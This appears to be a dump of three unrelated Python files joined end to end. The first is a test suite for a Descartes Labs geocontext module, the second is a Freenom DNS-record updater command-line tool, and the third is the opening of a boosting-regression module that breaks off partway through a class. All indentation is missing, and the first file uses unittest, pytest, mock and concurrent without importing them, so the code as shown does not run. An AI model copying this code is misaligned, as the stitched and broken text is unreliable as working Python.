import copy
import warnings
from descarteslabs.scenes import geocontext
import shapely.geometry
class SimpleContext(geocontext.GeoContext):
__slots__ = ("foo", "_bar")
def __init__(self, foo=None, bar=None):
super(SimpleContext, self).__init__()
self.foo = foo
self._bar = bar
class TestGeoContext(unittest.TestCase):
def test_repr(self):
simple = SimpleContext(1, False)
r = repr(simple)
expected = """SimpleContext(foo=1,
bar=False)"""
assert r == expected
def test_eq(self):
simple = SimpleContext(1, False)
simple2 = SimpleContext(1, False)
simple_diff = SimpleContext(1, True)
not_simple = geocontext.GeoContext()
assert simple == simple
assert simple == simple2
assert simple != simple_diff
assert simple != not_simple
def test_deepcopy(self):
simple = SimpleContext(1, False)
simple_copy = copy.deepcopy(simple)
assert simple._geometry_lock_ is not simple_copy._geometry_lock_
assert simple == simple_copy
class TestAOI(unittest.TestCase):
def test_init(self):
feature = {
"type": "Feature",
"geometry": {
"coordinates": (
(
(-93.52300099792355, 41.241436141055345),
(-93.7138666, 40.703737),
(-94.37053769704536, 40.83098709945576),
(-94.2036617, 41.3717716),
(-93.52300099792355, 41.241436141055345),
),
),
"type": "Polygon",
},
}
collection = {
"type": "FeatureCollection",
"features": [feature, feature, feature],
}
bounds_wgs84 = (-94.37053769704536, 40.703737, -93.52300099792355, 41.3717716)
resolution = 40
ctx = geocontext.AOI(collection, resolution=resolution)
assert ctx.resolution == resolution
assert tuple(round(e, 5) for e in ctx.bounds) == tuple(
round(e, 5) for e in bounds_wgs84
)
assert ctx.bounds_crs == "EPSG:4326"
assert isinstance(ctx.geometry, shapely.geometry.GeometryCollection)
assert ctx.__geo_interface__["type"] == "GeometryCollection"
assert ctx.__geo_interface__["geometries"][0] == feature["geometry"]
def test_raster_params(self):
geom = {
"coordinates": (
(
(-93.52300099792355, 41.241436141055345),
(-93.7138666, 40.703737),
(-94.37053769704536, 40.83098709945576),
(-94.2036617, 41.3717716),
(-93.52300099792355, 41.241436141055345),
),
),
"type": "Polygon",
}
bounds_wgs84 = (-94.37053769704536, 40.703737, -93.52300099792355, 41.3717716)
resolution = 40
crs = "EPSG:32615"
align_pixels = False
ctx = geocontext.AOI(geom, resolution, crs, align_pixels)
raster_params = ctx.raster_params
expected = {
"cutline": geom,
"resolution": resolution,
"srs": crs,
"bounds_srs": "EPSG:4326",
"align_pixels": align_pixels,
"bounds": bounds_wgs84,
"dimensions": None,
}
assert raster_params == expected
def test_assign(self):
geom = {
"coordinates": [
[
[-93.52300099792355, 41.241436141055345],
[-93.7138666, 40.703737],
[-94.37053769704536, 40.83098709945576],
[-94.2036617, 41.3717716],
[-93.52300099792355, 41.241436141055345],
]
],
"type": "Polygon",
}
ctx = geocontext.AOI(resolution=40)
ctx2 = ctx.assign(geometry=geom)
assert (
ctx2.geometry.__geo_interface__
== shapely.geometry.shape(geom).__geo_interface__
)
assert ctx2.resolution == 40
assert ctx2.align_pixels
assert ctx2.shape is None
ctx3 = ctx2.assign(geometry=None)
assert ctx3.geometry is None
def test_assign_update_bounds(self):
geom = shapely.geometry.Point(-90, 30).buffer(1).envelope
ctx = geocontext.AOI(geometry=geom, resolution=40)
geom_overlaps = shapely.affinity.translate(geom, xoff=1)
assert geom.intersects(geom_overlaps)
ctx_overlap = ctx.assign(geometry=geom_overlaps)
assert ctx_overlap.bounds == ctx.bounds
ctx_updated = ctx.assign(geometry=geom_overlaps, bounds="update")
assert ctx_updated.bounds == geom_overlaps.bounds
geom_doesnt_overlap = shapely.affinity.translate(geom, xoff=3)
with pytest.raises(ValueError, match="Geometry and bounds do not intersect"):
ctx.assign(geometry=geom_doesnt_overlap)
ctx_doesnt_overlap_updated = ctx.assign(
geometry=geom_doesnt_overlap, bounds="update"
)
assert ctx_doesnt_overlap_updated.bounds == geom_doesnt_overlap.bounds
with pytest.raises(
ValueError, match="A geometry must be given with which to update the bounds"
):
ctx.assign(bounds="update")
def test_assign_update_bounds_crs(self):
ctx = geocontext.AOI(bounds_crs="EPSG:32615")
assert ctx.bounds_crs == "EPSG:32615"
geom = shapely.geometry.Point(-20, 30).buffer(1).envelope
ctx_no_update_bounds = ctx.assign(geometry=geom)
assert ctx_no_update_bounds.bounds_crs == "EPSG:32615"
ctx_update_bounds = ctx.assign(geometry=geom, bounds="update")
assert ctx_update_bounds.bounds_crs == "EPSG:4326"
with pytest.raises(
ValueError,
match="Can't compute bounds from a geometry while also explicitly setting",
):
ctx = geocontext.AOI(geometry=geom, resolution=40, bounds_crs="EPSG:32615")
def test_validate_bounds_values_for_bounds_crs__latlon(self):
# invalid latlon bounds
with pytest.raises(ValueError, match="Bounds must be in lat-lon coordinates"):
geocontext.AOI(
bounds_crs="EPSG:4326", bounds=[500000, 2000000, 501000, 2001000]
)
# valid latlon bounds, no error should raise
geocontext.AOI(bounds_crs="EPSG:4326", bounds=[12, -41, 14, -40])
def test_validate_bounds_values_for_bounds_crs__non_latlon(self):
# valid latlon bounds, should warn
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
ctx = geocontext.AOI(bounds_crs="EPSG:32615", bounds=(12, -41, 14, -40))
assert ctx.bounds_crs == "EPSG:32615"
assert ctx.bounds == (12, -41, 14, -40)
warning = w[0]
assert "You might have the wrong `bounds_crs` set." in str(warning.message)
# not latlon bounds, no error should raise
geocontext.AOI(
bounds_crs="EPSG:32615", bounds=[500000, 2000000, 501000, 2001000]
)
def test_validate_shape(self):
with pytest.raises(TypeError):
geocontext.AOI(shape=120)
with pytest.raises(TypeError):
geocontext.AOI(shape=(120, 0, 0))
def test_validate_resolution(self):
with pytest.raises(TypeError):
geocontext.AOI(resolution="foo")
with pytest.raises(ValueError):
geocontext.AOI(resolution=-1)
def test_validate_resolution_shape(self):
with pytest.raises(ValueError):
geocontext.AOI(resolution=40, shape=(120, 280))
def test_validate_bound_geom_intersection(self):
# bounds don't intersect
with pytest.raises(ValueError, match="Geometry and bounds do not intersect"):
geocontext.AOI(
geometry=shapely.geometry.box(0, 0, 1, 1),
bounds=[5, 5, 6, 6],
bounds_crs="EPSG:4326",
)
# bounds do intersect; no error should raise
geocontext.AOI(
geometry=shapely.geometry.box(0, 0, 1, 1),
bounds=[0.5, 0.5, 3, 4],
bounds_crs="EPSG:4326",
)
# bounds_crs is not WGS84, so we can't check if bounds and geometry intersect or not---no error should raise
geocontext.AOI(
geometry=shapely.geometry.box(0, 0, 1, 1),
bounds_crs="EPSG:32615",
bounds=[500000, 2000000, 501000, 2001000],
)
def test_validate_reasonable_resolution(self):
# different CRSs --- no error
ctx = geocontext.AOI(
crs="EPSG:32615",
bounds_crs="EPSG:4326",
bounds=[0, 0, 1.5, 1.5],
resolution=15,
)
assert ctx.crs == "EPSG:32615"
assert ctx.bounds_crs == "EPSG:4326"
assert ctx.bounds == (0, 0, 1.5, 1.5)
assert ctx.resolution == 15
# same CRSs, bounds < resolution --- no error
geocontext.AOI(
crs="EPSG:32615",
bounds_crs="EPSG:32615",
bounds=[200000, 5000000, 200100, 5000300],
resolution=15,
)
# same CRSs, width < resolution --- error
with pytest.raises(ValueError, match="less than one pixel wide"):
geocontext.AOI(
crs="EPSG:32615",
bounds_crs="EPSG:32615",
bounds=[200000, 5000000, 200001, 5000300],
resolution=15,
)
# same CRSs, height < resolution --- error
with pytest.raises(ValueError, match="less than one pixel tall"):
geocontext.AOI(
crs="EPSG:32615",
bounds_crs="EPSG:32615",
bounds=[200000, 5000000, 200100, 5000001],
resolution=15,
)
# same CRSs, width < resolution, CRS is lat-lon --- error including "decimal degrees"
with pytest.raises(
ValueError, match="resolution must be given in decimal degrees"
):
geocontext.AOI(
crs="EPSG:4326",
bounds_crs="EPSG:4326",
bounds=[10, 10, 11, 11],
resolution=15,
)
class TestDLTIle(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.key = "128:16:960.0:15:-1:37"
cls.dltile_dict = {
"geometry": {
"coordinates": [
[
[-94.64171754779824, 40.9202359006794],
[-92.81755164322226, 40.93177944075989],
[-92.81360932958779, 42.31528732533928],
[-94.6771717075502, 42.303172487087394],
[-94.64171754779824, 40.9202359006794],
]
],
"type": "Polygon",
},
"properties": {
"cs_code": "EPSG:32615",
"key": "128:16:960.0:15:-1:37",
"outputBounds": [361760.0, 4531200.0, 515360.0, 4684800.0],
"pad": 16,
"resolution": 960.0,
"ti": -1,
"tilesize": 128,
"tj": 37,
"zone": 15,
"geotrans": [361760.0, 960.0, 0, 4684800.0, 0, -960.0],
"proj4": "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs ",
"wkt": 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]', # noqa
},
"type": "Feature",
}
cls.key2 = "128:8:960.0:15:-1:37"
cls.dltile2_dict = {
"geometry": {
"coordinates": [
[
[-94.55216325894683, 40.99065655298372],
[-92.90868033200002, 41.00107128418895],
[-92.90690635754177, 42.246233215798036],
[-94.58230042864014, 42.235355721757024],
[-94.55216325894683, 40.99065655298372],
]
],
"type": "Polygon",
},
"properties": {
"cs_code": "EPSG:32615",
"geotrans": [369440.0, 960.0, 0, 4677120.0, 0, -960.0],
"key": "128:8:960.0:15:-1:37",
"outputBounds": [369440.0, 4538880.0, 507680.0, 4677120.0],
"pad": 8,
"proj4": "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs ",
"resolution": 960.0,
"ti": -1,
"tilesize": 128,
"tj": 37,
"wkt": 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]', # noqa
"zone": 15,
},
"type": "Feature",
}
@mock.patch("descarteslabs.scenes.geocontext.Raster")
def test_from_key(self, mock_raster):
mock_raster_instance = mock_raster.return_value
mock_raster_instance.dltile.return_value = self.dltile_dict
tile = geocontext.DLTile.from_key(self.key)
mock_raster_instance.dltile.assert_called_with(self.key)
assert tile.key == self.key
assert tile.resolution == 960
assert tile.pad == 16
assert tile.tilesize == 128
assert tile.crs == "EPSG:32615"
assert tile.bounds == (361760.0, 4531200.0, 515360.0, 4684800.0)
assert tile.bounds_crs == "EPSG:32615"
assert tile.raster_params == {"dltile": self.key, "align_pixels": False}
assert tile.geotrans == (361760.0, 960, 0, 4684800.0, 0, -960)
assert tile.proj4 == "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs "
assert (
tile.wkt
== 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]' # noqa
)
@mock.patch("descarteslabs.scenes.geocontext.Raster")
def test_assign(self, mock_raster):
mock_raster_instance = mock_raster.return_value
mock_raster_instance.dltile.return_value = self.dltile_dict
tile = geocontext.DLTile.from_key(self.key)
mock_raster_instance.dltile.assert_called_with(self.key)
mock_raster_instance.dltile.return_value = self.dltile2_dict
tile = tile.assign(8)
mock_raster_instance.dltile.assert_called_with(self.key2)
assert tile.key == self.key2
assert tile.resolution == 960
assert tile.pad == 8
assert tile.tilesize == 128
assert tile.crs == "EPSG:32615"
assert tile.bounds == (369440.0, 4538880.0, 507680.0, 4677120.0)
assert tile.bounds_crs == "EPSG:32615"
assert tile.raster_params == {"dltile": self.key2, "align_pixels": False}
assert tile.geotrans == (369440.0, 960.0, 0, 4677120.0, 0, -960.0)
assert tile.proj4 == "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs "
assert (
tile.wkt
== 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]' # noqa
)
class TestXYZTile(unittest.TestCase):
def test_bounds(self):
tile = geocontext.XYZTile(1, 1, 2)
assert tile.bounds == (-10018754.171394622, 0.0, 0.0, 10018754.171394622)
def test_geometry(self):
tile = geocontext.XYZTile(1, 1, 2)
assert tile.geometry.bounds == (-90.0, 0.0, 0.0, 66.51326044311186)
def test_resolution(self):
tile = geocontext.XYZTile(1, 1, 0)
assert tile.resolution == geocontext.EARTH_CIRCUMFERENCE_WGS84 / tile.tilesize
# resolution at zoom 0 is just the Earth's circumfrence divided by tilesize
assert geocontext.XYZTile(1, 1, 2).resolution == (
geocontext.XYZTile(1, 1, 3).resolution * 2
)
# resolution halves with each zoom level
assert (
geocontext.XYZTile(1, 1, 12).resolution
== geocontext.XYZTile(2048, 1024, 12).resolution
)
# resolution is invariant to location; only depends on zoom
def test_raster_params(self):
tile = geocontext.XYZTile(1, 1, 2)
assert tile.raster_params == {
"bounds": (-10018754.171394622, 0.0, 0.0, 10018754.171394622),
"srs": "EPSG:3857",
"bounds_srs": "EPSG:3857",
"align_pixels": False,
"resolution": 39135.75848201024,
}
def test_children_parent(self):
tile = geocontext.XYZTile(1, 1, 2)
assert tile == tile.children()[0].parent()
# can't use the word `test` in the function name otherwise nose tries to run it...
def run_threadsafe_experiment(geoctx_factory, property, n=80000):
"In a subprocess, test whether parallel access to a property on a GeoContext fails (due to Shapely thread-unsafety)"
conn_ours, conn_theirs = multiprocessing.Pipe(duplex=False)
# Run actual test in a separate process, because unsafe use of Shapely objects
# across threads can occasionally cause segfaults, so we want to check the exit
# code of the process doing the testing.
def threadsafe_test(geoctx_factory, property, conn, n):
ctx = geoctx_factory()
with concurrent.futures.ThreadPoolExecutor(
max_workers=multiprocessing.cpu_count()
) as executor:
futures = [
executor.submit(lambda: getattr(ctx, property)) for i in range(n)
]
errors = []
for future in concurrent.futures.as_completed(futures):
if future.exception() is not None:
errors.append("exception: {}".format(future.exception()))
conn.send(errors)
p = multiprocessing.Process(
target=threadsafe_test, args=(geoctx_factory, property, conn_theirs, n)
)
p.start()
p.join()
if p.exitcode < 0:
errors = ["failed with exit code {}".format(p.exitcode)]
else:
errors = conn_ours.recv()
return errors
@unittest.skip(
"Slow test. Un-skip this and run manually if touching any code related to `_geometry_lock_`!"
)
class TestShapelyThreadSafe(unittest.TestCase):
@staticmethod
def aoi_factory():
return geocontext.AOI(
{
"coordinates": [
[
[-93.52300099792355, 41.241436141055345],
[-93.7138666, 40.703737],
[-94.37053769704536, 40.83098709945576],
[-94.2036617, 41.3717716],
[-93.52300099792355, 41.241436141055345],
]
],
"type": "Polygon",
},
crs="EPSG:3857",
resolution=10,
)
@staticmethod
def dltile_factory():
return geocontext.DLTile(
{
"geometry": {
"coordinates": [
[
[-94.64171754779824, 40.9202359006794],
[-92.81755164322226, 40.93177944075989],
[-92.81360932958779, 42.31528732533928],
[-94.6771717075502, 42.303172487087394],
[-94.64171754779824, 40.9202359006794],
]
],
"type": "Polygon",
},
"properties": {
"cs_code": "EPSG:32615",
"key": "128:16:960.0:15:-1:37",
"outputBounds": [361760.0, 4531200.0, 515360.0, 4684800.0],
"pad": 16,
"resolution": 960.0,
"ti": -1,
"tilesize": 128,
"tj": 37,
"zone": 15,
"geotrans": [361760.0, 960.0, 0, 4684800.0, 0, -960.0],
"proj4": "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs ",
"wkt": 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]', # noqa
},
"type": "Feature",
}
)
def test_aoi_raster_params_threadsafe(self):
errors = run_threadsafe_experiment(self.aoi_factory, "raster_params")
assert errors == []
def test_aoi_geo_interface_threadsafe(self):
errors = run_threadsafe_experiment(self.aoi_factory, "__geo_interface__")
assert errors == []
def test_dltile_geo_interface_threadsafe(self):
errors = run_threadsafe_experiment(self.dltile_factory, "__geo_interface__")
assert errors == []
|
fdu.py
|
#!/usr/bin/env python
import datetime
import json
import pathlib
import platform
import pprint
import sys
import time
import traceback
from multiprocessing import Process
import click
import requests
import six
import yaml
import freenom_dns_updater
from freenom_dns_updater.get_my_ip import *
is_windows = any(platform.win32_ver())
if six.PY2:
try:
from urlparse import urlparse
except ImportError:
raise
else:
from urllib.parse import urlparse
_format_map = {
None: lambda x: x,
'TEXT': lambda x: pprint.pformat(x),
'JSON': lambda x: json.dumps(x, sort_keys=True),
'YAML': lambda x: yaml.safe_dump(x)
}
def format_data(data, formater='TEXT'):
if isinstance(data, (list, tuple, set)):
data = [format_data(x, None) for x in data]
elif isinstance(data, dict):
data = {format_data(k, None): format_data(v, None) for k, v in six.iteritems(data)}
elif isinstance(data, freenom_dns_updater.Domain):
data = format_data({'name': data.name, 'state': data.state,
'type': data.type, 'id': data.id,
'register': data.register_date,
'expire': data.expire_date}, None)
elif isinstance(data, freenom_dns_updater.Record):
data = format_data({'name': data.name, 'type': data.type.name,
'ttl': data.ttl, 'target': data.target}, None)
elif isinstance(data, datetime.date):
data = str(data)
return _format_map[formater](data)
click_record_type = click.Choice([t.name for t in freenom_dns_updater.RecordType])
@click.group()
@click.version_option('1.0')
@click.help_option('--help', '-h')
def cli():
pass
@cli.group(help='''Manage records''')
@click.help_option('--help', '-h')
def record():
pass
@cli.group(help='''Manage domain''')
@click.help_option('--help', '-h')
def domain():
pass
@record.command('ls', help='List records of a specified domain')
@click.argument('user')
@click.argument('password')
@click.argument('domain')
@click.option('-f', '--format', help='Output format', default='TEXT', type=click.Choice(("TEXT", "JSON", "YAML")))
@click.help_option('--help', '-h')
def record_ls(user, password, domain, format):
freenom = freenom_dns_updater.Freenom()
if not freenom.login(user, password):
click.secho('Unable to login with the given credential', fg='red', bold=True)
sys.exit(6)
# search the domain
for d in freenom.list_domains():
if d.name == domain:
domain = d
break
if not isinstance(domain, freenom_dns_updater.Domain):
click.secho("You don't own the domain \"{}\"".format(domain), fg='yellow', bold=True)
sys.exit(7)
records = freenom.list_records(domain)
click.echo(format_data(records, format))
@record.command('add', help='Add a record into a specified domain')
@click.argument('user')
@click.argument('password')
@click.argument('domain')
@click.option('-n', '--name', help='Record name. Used as subdomain in A records')
@click.option('-t', '--type', help='Record type. A or AAAA for instance', type=click_record_type)
@click.option('-a', '--target', help='Record target. An ip address for A record')
@click.option('-l', '--ttl', help='Record time to live.', type=click.INT)
@click.option('-u', '--update', help='Update existing record', default=True, type=click.BOOL)
@click.help_option('--help', '-h')
def record_add(user, password, domain, name, type, target, ttl, update):
d = {'login': user, 'password': password, 'record': []}
record = {'domain': domain}
if name:
record['name'] = name
if type:
record['type'] = type
if target:
record['target'] = target
if ttl:
record['ttl'] = ttl
d['record'].append(record)
config = freenom_dns_updater.Config(d)
ok_count, err_count = record_action(lambda freenom, rec: freenom.add_record(rec, update), config, False)
if ok_count:
click.echo('Record successfully added{}.'.format("/updated" if update else ""))
else:
click.secho('No record updated', fg='yellow', bold=True)
@record.command('update', help='Update a record')
@click.argument('user')
@click.argument('password')
@click.argument('domain')
@click.option('-n', '--name', help='Record name. Used as subdomain in A records')
@click.option('-t', '--type', help='Record type. A or AAAA for instance', type=click_record_type)
@click.option('-a', '--target', help='Record target. An ip address for A records')
@click.option('-l', '--ttl', help='Record time to live.', type=click.INT)
@click.help_option('--help', '-h')
def record_update(user, password, domain, name, type, target, ttl):
d = {'login': user, 'password': password, 'record': []}
record = {'domain': domain}
if name:
record['name'] = name
if type:
record['type'] = type
if target:
record['target'] = target
if ttl:
record['ttl'] = ttl
d['record'].append(record)
config = freenom_dns_updater.Config(d)
ok_count, err_count = record_action(lambda freenom, rec: freenom.add_record(rec, True), config, False)
if ok_count:
click.echo('Record successfully added/updated.')
else:
click.secho('No record updated', fg='yellow', bold=True)
@record.command('rm', help='Remove a record from a specified domain')
@click.argument('user')
@click.argument('password')
@click.argument('domain')
@click.option('-n', '--name', help='Record name. Used as subdomain in A records')
@click.option('-t', '--type', help='Record type. A or AAAA for instance', type=click_record_type)
@click.option('-a', '--target', help='Record target. An ip address for A record')
@click.option('-l', '--ttl', help='Record time to live.', type=click.INT)
@click.option('-u', '--update', help='Update existing record', default=True, type=click.BOOL)
@click.help_option('--help', '-h')
def record_rm(user, password, domain, name, type, target, ttl, update):
d = {'login': user, 'password': password, 'record': []}
record = {'domain': domain}
if name:
record['name'] = name
if type:
record['type'] = type
if target:
record['target'] = target
if ttl:
record['ttl'] = ttl
d['record'].append(record)
config = freenom_dns_updater.Config(d)
ok_count, err_count = record_action(lambda freenom, rec: freenom.remove_record(rec), config, False)
if ok_count:
click.echo('Record successfully removed.')
else:
click.secho('No record removed', fg='yellow', bold=True)
def _update(config, ignore_errors):
config = freenom_dns_updater.Config(config_src(config))
ok_count, err_count = record_action(lambda freenom, rec: freenom.add_record(rec, True), config, ignore_errors)
if ok_count:
if not err_count:
click.echo('Successfully Updated {} record{}'.format(ok_count, "s" if ok_count > 1 else ""))
else:
click.echo('Updated {} record{}'.format(ok_count, "s" if ok_count > 1 else ""))
else:
click.secho('No record updated', fg='yellow', bold=True)
def config_src(config):
url = urlparse(config)
if url.scheme in ('file', 'http', 'https'):
ret = requests.get(config, stream=True).raw
else: # except a file
ret = pathlib.Path(config)
if not ret.is_file():
click.secho('File "{}" not found.'.format(ret), fg='red', bold=True)
sys.exit(5)
return ret
@cli.command('update', help='''Update records according to a configuration file''')
@click.argument('config', default='freenom.yml')
@click.option('-i', '--ignore-errors', default=False, help='ignore errors when updating', is_flag=True)
@click.help_option('--help', '-h')
def update(config, ignore_errors):
return _update(config, ignore_errors)
def record_action(action, config, ignore_errors):
records = config.records
if not records:
click.secho('There is no record configured', fg='yellow', bold=True)
freenom = freenom_dns_updater.Freenom()
if not freenom.login(config.login, config.password):
click.secho('Unable to login with the given credential', fg='red', bold=True)
sys.exit(6)
domains = freenom.list_domains()
domains_mapping = {d.name: d for d in domains}
ok_count = 0
err_count = 0
for rec in records:
domain_name = rec.domain.name
rec.domain = domains_mapping.get(domain_name)
if rec.domain is None:
click.secho("You don't own the domain \"{}\"".format(domain_name), fg='yellow', bold=True)
if ignore_errors:
continue
else:
sys.exit(7)
try:
action(freenom, rec)
except Exception as e:
if not ignore_errors:
raise
# TODO log e
err_count += 1
else:
ok_count += 1
return ok_count, err_count
@domain.command('ls', help='List domains')
@click.argument('user')
@click.argument('password')
@click.option('-f', '--format', help='Output format', default='TEXT', type=click.Choice(("TEXT", "JSON", "YAML")))
@click.help_option('--help', '-h')
def domain_ls(user, password, format):
freenom = freenom_dns_updater.Freenom()
if not freenom.login(user, password):
click.secho('Unable to login with the given credential', fg='red', bold=True)
sys.exit(6)
# search the domain
domains = freenom.list_domains()
click.echo(format_data(domains, format))
@cli.command(help='''Regularly update records according to a configuration file''')
@click.argument('config', default='freenom.yml' if is_windows else '/etc/freenom.yml')
@click.option('-t', '--period', default=60 * 60, help='update period in second', type=click.IntRange(10, 2592000))
@click.option('-i', '--ignore-errors', help='ignore errors when updating', is_flag=True)
@click.option('-c', '--cache', help='cache ip and update only if there is any changes', is_flag=True)
@click.help_option('--help', '-h')
def process(config, period, ignore_errors, cache):
config_src(config)
ipv4 = ''
ipv6 = ''
while 1:
try:
new_ipv4 = ''
new_ipv6 = ''
update_needed = True
if cache:
try:
new_ipv4 = str(get_my_ipv4())
except:
pass
try:
new_ipv6 = str(get_my_ipv6())
except:
pass
update_needed = ipv4 != new_ipv4 or ipv6 != new_ipv6
if update_needed:
p = Process(target=_update, args=(config, ignore_errors))
p.start()
p.join(500)
if cache:
ipv4 = new_ipv4
ipv6 = new_ipv6
except:
traceback.print_exc(file=sys.stderr)
finally:
time.sleep(period)
if __name__ == '__main__':
cli()
|
_boosting.py
|
"""
Boosting as described by David et al. (2007).
Versions
--------
7: Accept segmented data, respect segmentation (don't concatenate data)
Profiling
---------
ds = datasets._get_continuous()
y = ds['y']
x1 = ds['x1']
x2 = ds['x2']
%prun -s cumulative res = boosting(y, x1, 0, 1)
"""
import inspect
from itertools import product
from multiprocessing import Process, Queue
from multiprocessing.sharedctypes import RawArray
import os
import time
from threading import Event, Thread
import numpy as np
from numpy import newaxis
from scipy.linalg import norm
import scipy.signal
from scipy.stats import spearmanr
from tqdm import tqdm
from .._config import CONFIG
from .._data_obj import NDVar
from .._utils import LazyProperty, user_activity
from ._boosting_opt import l1, l2, generate_options, update_error
from .shared import RevCorrData
# BoostingResult version
VERSION = 9
# process messages
JOB_TERMINATE = -1
# error functions
ERROR_FUNC = {'l2': l2, 'l1': l1}
DELTA_ERROR_FUNC = {'l2': 2, 'l1': 1}
class BoostingResult:
"""Result from boosting a temporal response function
Attributes
----------
h : NDVar | tuple of NDVar
The temporal response function. Whether ``h`` is an NDVar or a tuple of
NDVars depends on whether the ``x`` parameter to :func:`boosting` was
an NDVar or a sequence of NDVars.
h_scaled : NDVar | tuple of NDVar
``h`` scaled such that it applies to the original input ``y`` and ``x``.
If boosting was done with ``scale_data=False``, ``h_scaled`` is the same
as ``h``.
h_source : NDVar | tuple of NDVar
If ``h`` was constructed using a basis, ``h_source`` represents the
source of ``h`` before being convolved with the basis.
h_time : UTS
Time dimension of the kernel.
r : float | NDVar
Correlation between the measured response and the response predicted
with ``h``. Type depends on the ``y`` parameter to :func:`boosting`.
spearmanr : float | NDVar
As ``r``, the Spearman rank correlation.
t_run : float
Time it took to run the boosting algorithm (in seconds).
error : str
The error evaluation method used.
residual : float | NDVar
The fit error, i.e. the result of the ``error`` error function on the
final fit.
delta : scalar
Kernel modification step used.
mindelta : None | scalar
Mindelta parameter used.
scale_data : bool
Scale_data parameter used.
y_mean : NDVar | scalar
Mean that was subtracted from ``y``.
y_scale : NDVar | scalar
Scale by which ``y`` was divided.
x_mean : NDVar | scalar | tuple
Mean that was subtracted from ``x``.
x_scale : NDVar | scalar | tuple
Scale by which ``x`` was divided.
partitions : int
Numbers of partitions of the data used for cross validation.
"""
def __init__(
self,
# input parameters
y, x, tstart, tstop, scale_data, delta, mindelta, error,
basis, basis_window, partitions_arg, partitions, model,
# result parameters
h, r, isnan, spearmanr, residual, t_run,
y_mean, y_scale, x_mean, x_scale, y_info={}, r_l1=None,
# new parameters
selective_stopping=0,
**debug_attrs,
):
# input parameters
self.y = y
self.x = x
self.tstart = tstart
self.tstop = tstop
self.scale_data = scale_data
self.delta = delta
self.mindelta = mindelta
self.error = error
self._partitions_arg = partitions_arg
self.partitions = partitions
self.model = model
self.basis = basis
self.basis_window = basis_window
self.selective_stopping = selective_stopping
# results
self._h = h
self._y_info = y_info
self.r = r
self.r_l1 = r_l1
self._isnan = isnan
self.spearmanr = spearmanr
self.residual = residual
self.t_run = t_run
self.y_mean = y_mean
self.y_scale = y_scale
self.x_mean = x_mean
self.x_scale = x_scale
self._debug_attrs = debug_attrs
for k, v in debug_attrs.items():
setattr(self, k, v)
def __getstate__(self):
return {
# input parameters
'y': self.y, 'x': self.x, 'tstart': self.tstart, 'tstop': self.tstop,
'scale_data': self.scale_data, 'delta': self.delta,
'mindelta': self.mindelta, 'error': self.error,
'partitions_arg': self._partitions_arg, 'partitions': self.partitions,
'model': self.model, 'basis': self.basis,
'basis_window': self.basis_window,
'selective_stopping': self.selective_stopping,
# results
